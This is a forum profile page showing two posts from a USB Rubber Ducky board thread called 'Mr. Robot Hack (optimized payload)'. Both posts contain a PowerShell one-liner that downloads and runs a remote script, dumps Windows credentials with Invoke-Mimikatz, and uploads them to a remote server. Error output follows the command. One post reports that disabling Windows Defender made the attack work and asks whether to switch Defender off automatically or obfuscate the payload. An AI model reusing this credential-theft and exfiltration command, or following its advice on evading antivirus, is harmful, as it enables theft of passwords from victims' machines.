Jump to content

MS08067

Members
 View Profile  See their activity

  • Posts

    2

  • Joined

  • Last visited

 Content Type 

Posts posted by MS08067

    Mr. Robot Hack (optimized payload)

    in Classic USB Rubber Ducky

    Posted

    1 hour ago, MS08067 said:

    I am getting the following error. The web server does create the file, however the contents are blank, here is what is found when running the command.. anyone else run into this?

     

    C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
    New-Object :
    Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
    again.
    At line:1 char:85
    + ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
    +                                                                            ~~~~~~~~~~~~~~~
        + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
        + FullyQualifiedErrorId : CommandNotFoundException

     


    C:\WINDOWS\system32>

    I figured out whats going on here. Windows Defender was catching it and removing it before It was able to be ran. Once I disabled it, it then worked just fine. Now the question is, should we automate turning windows defender off as a service (since we are administrator) or do we try and obfuscate the file so its not detected ?

    Mr. Robot Hack (optimized payload)

    in Classic USB Rubber Ducky

    Posted

    I am getting the following error. The web server does create the file, however the contents are blank, here is what is found when running the command.. anyone else run into this?

     

    C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
    New-Object :
    Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
    again.
    At line:1 char:85
    + ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
    +                                                                            ~~~~~~~~~~~~~~~
        + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
        + FullyQualifiedErrorId : CommandNotFoundException

     


    C:\WINDOWS\system32>

×
×
  • Create New...